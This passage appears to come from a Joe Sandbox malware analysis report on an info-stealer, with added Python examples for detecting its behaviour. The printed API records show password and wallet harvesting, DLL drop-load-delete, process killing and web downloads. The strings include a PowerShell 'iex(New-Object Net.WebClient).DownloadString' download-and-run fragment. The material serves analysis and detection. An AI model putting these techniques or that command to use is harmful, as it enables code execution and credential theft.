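     "Image": r"C:\Users\user\Downloads\setup.exe", "TargetFilename": r"C:\ProgramData\Vendor\helper.dll"},
    {"EventID": 7, "UtcTime": "2024-01-01 12:05:00.500", "ProcessId": 5000,
     "Image": r"C:\Users\user\Downloads\setup.exe", "ImageLoaded": r"C:\ProgramData\Vendor\helper.dll",
     "Signed": "true"},
]


def _ts(event):
    return datetime.strptime(event["UtcTime"], "%Y-%m-%d %H:%M:%S.%f")


def find_drop_load_delete(events, window=WINDOW):
    """Return one alert per (pid, path) that was created, image-loaded and
    deleted by the same process, in that order, within `window`."""
    stages = defaultdict(dict)
    for e in sorted(events, key=_ts):
        path = (e.get("TargetFilename") or e.get("ImageLoaded") or "").lower()
        if not path.endswith(".dll") or not path.startswith(WATCHED_PREFIXES):
            continue
        stage = STAGE.get(e["EventID"])
        if stage:
            # Keep the first event of each stage per (process, path).
            stages[(e["ProcessId"], path)].setdefault(stage, e)
    alerts = []
    for (pid, path), seen in stages.items():
        if not {"create", "load", "delete"} <= set(seen):
            continue
        c, l, d = seen["create"], seen["load"], seen["delete"]
        if _ts(c) <= _ts(l) <= _ts(d) and _ts(d) - _ts(c) <= window:
            alerts.append({"pid": pid, "image": c["Image"], "path": path,
                           "loaded_signed": l.get("Signed", "unknown"),
                           "lifetime_s": (_ts(d) - _ts(c)).total_seconds()})
    return alerts


if __name__ == "__main__":
    for a in find_drop_load_delete(EVENTS):
        print(f"[{a['pid']}] {a['image']} dropped, loaded (signed={a['loaded_signed']}) "
              f"and deleted {a['path']} after {a['lifetime_s']:.1f}s")
```

The ordering check matters: a legitimate updater that deletes a stale DLL and then writes and loads a new one produces the same three event types, but not in create, load, delete order for one path within the window. Sysmon must be configured to log ImageLoad (event 7) for this to fire; many default configurations filter it heavily.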
                                  APIs
                                    • Part of subcall function 00718CF0: GetSystemTime.KERNEL32(00720E1B,011DA4D8,007205B6,?,?,007013F9,?,0000001A,00720E1B,00000000,?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 00718D16
                                  • wsprintfA.USER32 ref: 00709E7F
                                  • lstrcat.KERNEL32(00000000,?), ref: 00709F03
                                  • lstrcat.KERNEL32(00000000,?), ref: 00709F17
                                  • lstrcat.KERNEL32(00000000,007212D8), ref: 00709F29
                                  • lstrcpy.KERNEL32(?,00000000), ref: 00709F7C
                                  • Sleep.KERNEL32(00001388), ref: 0070A013
                                    • Part of subcall function 007199A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007199C5
                                    • Part of subcall function 007199A0: Process32First.KERNEL32(0070A056,00000128), ref: 007199D9
                                    • Part of subcall function 007199A0: Process32Next.KERNEL32(0070A056,00000128), ref: 007199F2
                                    • Part of subcall function 007199A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00719A4E
                                    • Part of subcall function 007199A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00719A6C
                                    • Part of subcall function 007199A0: CloseHandle.KERNEL32(00000000), ref: 00719A79
                                    • Part of subcall function 007199A0: CloseHandle.KERNEL32(0070A056), ref: 00719A88
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: same memory dump set as listed for the first function record above
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$CloseHandleProcessProcess32$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
                                  • String ID: D
                                  • API String ID: 531068710-2746444292
                                  • Opcode ID: 24f6466400b9e7fad0b87fd25dc957a5be3be8f508be21a704009b43a35d1969
                                  • Instruction ID: 198ff437270fb4693e6beaa4c5b61aa844457ddec6f61f9589480952423339e4
                                  • Opcode Fuzzy Hash: 24f6466400b9e7fad0b87fd25dc957a5be3be8f508be21a704009b43a35d1969
                                  • Instruction Fuzzy Hash: B25178B5944318EBEB24DBA4DC4AFDA7378AB44704F004598B60DAB2C1EB756BC4CF51
                                  APIs
                                  • _ValidateLocalCookies.LIBCMT ref: 0077FA1F
                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 0077FA27
                                  • _ValidateLocalCookies.LIBCMT ref: 0077FAB0
                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 0077FADB
                                  • _ValidateLocalCookies.LIBCMT ref: 0077FB30
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: same memory dump set as listed for the first function record above
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                  • String ID: csm
                                  • API String ID: 1170836740-1018135373
                                  • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                  • Instruction ID: a34003ccd3c8e5a087d7ceee8e9e941054c5645e4d0746d2d6157eda08b2796a
                                  • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                  • Instruction Fuzzy Hash: AE41E530A00209EFCF10EF68C984A9EBBB5FF4A364F15C165E91CAB391D7399905CB91
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0070501A
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00705021
                                  • InternetOpenA.WININET(00720DE3,00000000,00000000,00000000,00000000), ref: 0070503A
                                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00705061
                                  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00705091
                                  • InternetCloseHandle.WININET(?), ref: 00705109
                                  • InternetCloseHandle.WININET(?), ref: 00705116
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: same memory dump set as listed for the first function record above
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                  • String ID:
                                  • API String ID: 3066467675-0
                                  • Opcode ID: eb5e10b7e7a5b23d6a52367caf513b344248fe55b90f9f6dbd840b8d7b9a79eb
                                  • Instruction ID: dc2e57a2aaec0fabc68e0f242afb958206550eb680e79d5aaf16df1106ac79b0
                                  • Opcode Fuzzy Hash: eb5e10b7e7a5b23d6a52367caf513b344248fe55b90f9f6dbd840b8d7b9a79eb
                                  • Instruction Fuzzy Hash: 9F3119B4A45218EBDB20CF94DC85BDDB7B4AB48304F1081D9FB09A7281D7746EC58F98
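The function records above become useful to a detection engineer once their raw hex arguments are read back into the constants they encode: RegOpenKeyExA's 80000001 is HKEY_CURRENT_USER and 00020019 is KEY_READ, OpenProcess's 00000001 is PROCESS_TERMINATE, Sleep's 00001388 is 5000 ms, InternetOpenUrlA's 04000100 is INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_PRAGMA_NOCACHE, and InternetReadFile's 00000400 is a 1024-byte read. The parser below is an added example, not code from the report or from Joe Sandbox: it reads the "APIs" bullets in the exact form printed above (the sample records are copied from the registry-password, chrome.dll, process-termination and WinINet records on this page) and tags each record's behaviour; the tag names and decision rules are this example's own, not Joe Sandbox signatures.

```python
"""Parse the "APIs" bullets of Joe Sandbox function records and tag the
behaviour they show. Added example: not code from the report or Joe Sandbox.
SAMPLE_RECORDS is copied from the function records above; the tag names and
the decision rules are this example's own assumptions."""
import re
from collections import defaultdict

# One "APIs" bullet: optional "Part of subcall function ADDR:" prefix,
# Api.MODULE, optional "(args)", then "ref: ADDR".
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[\w:]+?)\.(?P<mod>[A-Z0-9]+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
# Constants from winreg.h / wininet.h used to decode the raw hex arguments.
HKEY = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
        0x80000002: "HKEY_LOCAL_MACHINE"}
WININET_FLAGS = {0x80000000: "INTERNET_FLAG_RELOAD", 0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
                 0x00800000: "INTERNET_FLAG_SECURE", 0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE"}

# Copied from the records above, keyed by the first ref address of each record.
SAMPLE_RECORDS = {
    "0070739A": r"""
• RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0070739A
• RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00707411
• StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0070746D
• task.LIBCPMTD ref: 007075B5
""",
    "007108CD": r"""
  • Part of subcall function 00719850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,007108DC,C:\ProgramData\chrome.dll), ref: 00719871
  • Part of subcall function 0070A090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 0070A098
• StrCmpCA.SHLWAPI(00000000,011D90B0), ref: 00710922
• DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00710C35
""",
    "00709E7F": r"""
• wsprintfA.USER32 ref: 00709E7F
• Sleep.KERNEL32(00001388), ref: 0070A013
  • Part of subcall function 007199A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007199C5
  • Part of subcall function 007199A0: Process32Next.KERNEL32(0070A056,00000128), ref: 007199F2
  • Part of subcall function 007199A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00719A4E
  • Part of subcall function 007199A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00719A6C
""",
    "0070501A": r"""
• InternetOpenA.WININET(00720DE3,00000000,00000000,00000000,00000000), ref: 0070503A
• InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00705061
• InternetReadFile.WININET(?,?,00000400,00000000), ref: 00705091
""",
}


def parse_api_line(line):
    """Return {api, mod, args, ref, sub} for one bullet, or None for other text."""
    m = API_LINE.match(line)
    if not m:
        return None
    args = [a.strip() for a in m["args"].split(",")] if m["args"] is not None else []
    return {"api": m["api"], "mod": m["mod"], "args": args, "ref": m["ref"], "sub": m["sub"]}


def decode_wininet_flags(value):
    return sorted(name for bit, name in WININET_FLAGS.items() if value & bit)


def classify(record_text):
    """Map one record's API bullets to behaviour tags with decoded evidence."""
    by_name = defaultdict(list)
    for call in filter(None, map(parse_api_line, record_text.splitlines())):
        by_name[call["api"]].append(call)
    names = set(by_name)
    tags = {}
    # Registry values enumerated and each one searched for the substring "Password".
    if "RegEnumValueA" in names and any("Password" in c["args"] for c in by_name["StrStrA"]):
        hives = [HKEY.get(int(c["args"][0], 16), c["args"][0])
                 for c in by_name["RegOpenKeyExA"] if c["args"] and c["args"][0] != "?"]
        tags["registry_password_scan"] = {"hives": hives, "ref": by_name["StrStrA"][0]["ref"]}
    # The same on-disk path written, loaded as a DLL and then deleted.
    paths = None
    for api in ("CreateFileA", "LoadLibraryA", "DeleteFileA"):
        seen = {a for c in by_name[api] for a in c["args"] if ":\\" in a}
        paths = seen if paths is None else paths & seen
    if paths:
        tags["drop_load_delete"] = sorted(paths)
    # Toolhelp process walk, OpenProcess with PROCESS_TERMINATE (0x1), TerminateProcess.
    if ({"CreateToolhelp32Snapshot", "Process32Next", "TerminateProcess"} <= names
            and any(c["args"][:1] == ["00000001"] for c in by_name["OpenProcess"])):
        tags["process_kill_loop"] = {"open_access": "PROCESS_TERMINATE",
                                     "sleep_ms": [int(c["args"][0], 16) for c in by_name["Sleep"]]}
    # WinINet fetch: dwFlags is InternetOpenUrlA's 5th argument, the read size InternetReadFile's 3rd.
    if {"InternetOpenUrlA", "InternetReadFile"} <= names:
        flags = int(by_name["InternetOpenUrlA"][0]["args"][4], 16)
        chunk = int(by_name["InternetReadFile"][0]["args"][2], 16)
        tags["wininet_download"] = {"flags": decode_wininet_flags(flags), "read_chunk": chunk}
    return tags


def classify_all(records=SAMPLE_RECORDS):
    return {name: sorted(classify(text)) for name, text in records.items()}


if __name__ == "__main__":
    for name, text in SAMPLE_RECORDS.items():
        print(name, classify(text))
```

The "Part of subcall function" bullets are folded into the calling record on purpose: the process-termination loop lives in 007199A0, but it is the caller at 00709E7F that pairs it with the five-second Sleep, and that pairing is the behaviour worth tagging. Joe Sandbox prints stack slots rather than typed parameters, so a "?" or a return address can occupy an argument position; the rules above only read positions whose meaning is fixed by the Win32 prototype.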
                                  APIs
                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 007185B6
                                  • wsprintfA.USER32 ref: 007185E9
                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0071860B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 0071861C
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00718629
                                    • Part of subcall function 0071AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0071AAF6
                                  • RegQueryValueExA.ADVAPI32(00000000,011DE1D0,00000000,000F003F,?,00000400), ref: 0071867C
                                  • lstrlen.KERNEL32(?), ref: 00718691
                                  • RegQueryValueExA.ADVAPI32(00000000,011DE1E8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00720B3C), ref: 00718729
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00718798
                                  • RegCloseKey.ADVAPI32(00000000), ref: 007187AA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: same memory dump set as listed for the first function record above
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 3896182533-4073750446
                                  • Opcode ID: 486f54af4a6fe91b8406eb7f9df8459267392f85db67bad5502cd45efd70b33b
                                  • Instruction ID: 46b87f4fbbbbeebc2c98add4c6349593769789ccdd1b9584706798bc0ab6dcfd
                                  • Opcode Fuzzy Hash: 486f54af4a6fe91b8406eb7f9df8459267392f85db67bad5502cd45efd70b33b
                                  • Instruction Fuzzy Hash: D4213B71A55218ABDB64DB94DC85FE9B3B8FB48700F0081D9A209A6180DF746AC5CFE4
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007199C5
                                  • Process32First.KERNEL32(0070A056,00000128), ref: 007199D9
                                  • Process32Next.KERNEL32(0070A056,00000128), ref: 007199F2
                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00719A4E
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00719A6C
                                  • CloseHandle.KERNEL32(00000000), ref: 00719A79
                                  • CloseHandle.KERNEL32(0070A056), ref: 00719A88
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                  • String ID:
                                  • API String ID: 2696918072-0
                                  • Opcode ID: 9f09f95ce467bee5692f02a613faaefaebc713bad4938c1e8ea0891fcb083908
                                  • Instruction ID: c4681a123760bd5b061055cc38d697e6c6a46a39aa1923d2ea09546504160a7d
                                  • Opcode Fuzzy Hash: 9f09f95ce467bee5692f02a613faaefaebc713bad4938c1e8ea0891fcb083908
                                  • Instruction Fuzzy Hash: C2211A74958218ABDB25DFA5CC99BDDB7B9BF48300F0081C9E609A6290D7789FC5CF50
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00717834
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0071783B
                                  • RegOpenKeyExA.ADVAPI32(80000002,011CB428,00000000,00020119,00000000), ref: 0071786D
                                  • RegQueryValueExA.ADVAPI32(00000000,011DE248,00000000,00000000,?,000000FF), ref: 0071788E
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00717898
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: Windows 11
                                  • API String ID: 3225020163-2517555085
                                  • Opcode ID: b060b40cea207fce06eecf0a639cd194ecd6feaa59e95a60acc8889c2d042e26
                                  • Instruction ID: ab4110db6278e55418b68b6d072b7d9cf3d0c81ad4b69f40ab5f765db8f29242
                                  • Opcode Fuzzy Hash: b060b40cea207fce06eecf0a639cd194ecd6feaa59e95a60acc8889c2d042e26
                                  • Instruction Fuzzy Hash: C0014475A5D305BBE704DBE4ED49FADB778EB44700F104159F605A6280E674A980DB60
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007178C4
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007178CB
                                  • RegOpenKeyExA.ADVAPI32(80000002,011CB428,00000000,00020119,00717849), ref: 007178EB
                                  • RegQueryValueExA.ADVAPI32(00717849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0071790A
                                  • RegCloseKey.ADVAPI32(00717849), ref: 00717914
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: CurrentBuildNumber
                                  • API String ID: 3225020163-1022791448
                                  • Opcode ID: 3f203f75908c85911c0a2f54e69bbeccf4934c743e4c44a839c17622d8da183c
                                  • Instruction ID: cf78945fc12bf95237a77977d2b775affd543d99a36daca8bada88596c67750d
                                  • Opcode Fuzzy Hash: 3f203f75908c85911c0a2f54e69bbeccf4934c743e4c44a839c17622d8da183c
                                  • Instruction Fuzzy Hash: CA0184B5A99309BFDB00DBD4DC49FAEB778EB04700F004585F605A6280E7706A40DBA0
                                  APIs
                                  • CreateFileA.KERNEL32(>=q,80000000,00000003,00000000,00000003,00000080,00000000,?,00713D3E,?), ref: 0071948C
                                  • GetFileSizeEx.KERNEL32(000000FF,>=q), ref: 007194A9
                                  • CloseHandle.KERNEL32(000000FF), ref: 007194B7
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseCreateHandleSize
                                  • String ID: >=q$>=q
                                  • API String ID: 1378416451-1428759962
                                  • Opcode ID: 2d605137ea72f5c4c1de53f8a7cc3934f2091c74b086a6309cc5b9c1b6b8d775
                                  • Instruction ID: 64a4089940fc49a80d98e06336eae2615cf93ac945dfd0f0821c25df1d629ae6
                                  • Opcode Fuzzy Hash: 2d605137ea72f5c4c1de53f8a7cc3934f2091c74b086a6309cc5b9c1b6b8d775
                                  • Instruction Fuzzy Hash: 4EF0A434E58208BBDB10DFF4DC59F9FB7B9AB48700F10C254FA11A71C0E67496429B40
                                  APIs
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0070A13C
                                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 0070A161
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 0070A181
                                  • ReadFile.KERNEL32(000000FF,?,00000000,0070148F,00000000), ref: 0070A1AA
                                  • LocalFree.KERNEL32(0070148F), ref: 0070A1E0
                                  • CloseHandle.KERNEL32(000000FF), ref: 0070A1EA
                                  Yara matches
                                  Similarity
                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                  • String ID:
                                  • API String ID: 2311089104-0
                                  • Opcode ID: 2cecb869dd9f910b80c53b4bad3207dd77351213f1d08abf84ccd7bc7e152cdc
                                  • Instruction ID: 0e916be3ad7f8a35f67295c0a9c989ef74fd7ca079fe301c82227c53064f4cd2
                                  • Opcode Fuzzy Hash: 2cecb869dd9f910b80c53b4bad3207dd77351213f1d08abf84ccd7bc7e152cdc
                                  • Instruction Fuzzy Hash: BD312D74A04309EFDB14CFA4D885BEEB7B5BF58304F108259E911A72D0D778AA81CFA1
                                  APIs
                                  • lstrcat.KERNEL32(?,011DE560), ref: 00714A2B
                                    • Part of subcall function 00718F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00718F9B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00714A51
                                  • lstrcat.KERNEL32(?,?), ref: 00714A70
                                  • lstrcat.KERNEL32(?,?), ref: 00714A84
                                  • lstrcat.KERNEL32(?,011CAC70), ref: 00714A97
                                  • lstrcat.KERNEL32(?,?), ref: 00714AAB
                                  • lstrcat.KERNEL32(?,011DDA28), ref: 00714ABF
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                    • Part of subcall function 00718F20: GetFileAttributesA.KERNEL32(00000000,?,00701B94,?,?,0072577C,?,?,00720E22), ref: 00718F2F
                                    • Part of subcall function 007147C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 007147D0
                                    • Part of subcall function 007147C0: RtlAllocateHeap.NTDLL(00000000), ref: 007147D7
                                    • Part of subcall function 007147C0: wsprintfA.USER32 ref: 007147F6
                                    • Part of subcall function 007147C0: FindFirstFileA.KERNEL32(?,?), ref: 0071480D
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                  • String ID:
                                  • API String ID: 2540262943-0
                                  • Opcode ID: 61435f33da03d7d628f165d54d07309f737b662632558b40d906ff373c7050ad
                                  • Instruction ID: e1feda759eab4d8c668e949faece651bb63549c3d3a627be1bcdbc60fbc692e2
                                  • Opcode Fuzzy Hash: 61435f33da03d7d628f165d54d07309f737b662632558b40d906ff373c7050ad
                                  • Instruction Fuzzy Hash: 4731A2F6954218A7CB24FBB4DC89EDD733DAB48300F404589B355960D1EE78A7C8CB95
                                  APIs
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                    • Part of subcall function 0071ACC0: lstrlen.KERNEL32(?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 0071ACD5
                                    • Part of subcall function 0071ACC0: lstrcpy.KERNEL32(00000000), ref: 0071AD14
                                    • Part of subcall function 0071ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0071AD22
                                    • Part of subcall function 0071AC30: lstrcpy.KERNEL32(00000000,?), ref: 0071AC82
                                    • Part of subcall function 0071AC30: lstrcat.KERNEL32(00000000), ref: 0071AC92
                                    • Part of subcall function 0071ABB0: lstrcpy.KERNEL32(?,00720E1A), ref: 0071AC15
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00712FD5
                                  Strings
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00712F54
                                  • <, xrefs: 00712F89
                                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00712F14
                                  • ')", xrefs: 00712F03
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  • API String ID: 3031569214-898575020
                                  • Opcode ID: 742d4af7c73ee09d0c284877f941df993d6022f5bf2a945fce70f259534ccf62
                                  • Instruction ID: 16bf4f88affa98090d9d64a8c0cedc2a9b53c3f2dcf16166bf64036d9c330873
                                  • Opcode Fuzzy Hash: 742d4af7c73ee09d0c284877f941df993d6022f5bf2a945fce70f259534ccf62
                                  • Instruction Fuzzy Hash: 54412DB0E11208EADB14FFA4D86ABEDB779AF14310F404459E002661D2DF782AC9CFA1
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,011DD7A8,00000000,00020119,?), ref: 00714344
                                  • RegQueryValueExA.ADVAPI32(?,011DE320,00000000,00000000,00000000,000000FF), ref: 00714368
                                  • RegCloseKey.ADVAPI32(?), ref: 00714372
                                  • lstrcat.KERNEL32(?,00000000), ref: 00714397
                                  • lstrcat.KERNEL32(?,011DE4E8), ref: 007143AB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                   • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$CloseOpenQueryValue
                                  • String ID:
                                  • API String ID: 690832082-0
                                  • Opcode ID: 6cd6d53c199d0b6b0700e6766b65d4491f49fea2241d1125ce25fc52f5b6eb8f
                                  • Instruction ID: b1d9421306b8b4153be41877df0fb2ab7e017ec6f6ba3c7d9a02753448a26a3f
                                  • Opcode Fuzzy Hash: 6cd6d53c199d0b6b0700e6766b65d4491f49fea2241d1125ce25fc52f5b6eb8f
                                  • Instruction Fuzzy Hash: 7441E8B6910108EBDB14EBE0EC8AFEE737DAB88300F404559B7155B1C1EA7957C88BE1
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                   • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: dllmain_raw$dllmain_crt_dispatch
                                  • String ID:
                                  • API String ID: 3136044242-0
                                  • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                  • Instruction ID: 6854f2a5b325cb610a7d5b72e9c18a2d19dd0b23b397050c592da3b21058abfd
                                  • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                  • Instruction Fuzzy Hash: 86217C72D00618EBDF239E65CD4597F7A69EB89BD0B05C12DF80D6B215C3388D519BB0
                                  APIs
                                  • GetSystemTime.KERNEL32(?), ref: 00716C0C
                                  • sscanf.NTDLL ref: 00716C39
                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00716C52
                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00716C60
                                  • ExitProcess.KERNEL32 ref: 00716C7A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                   • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
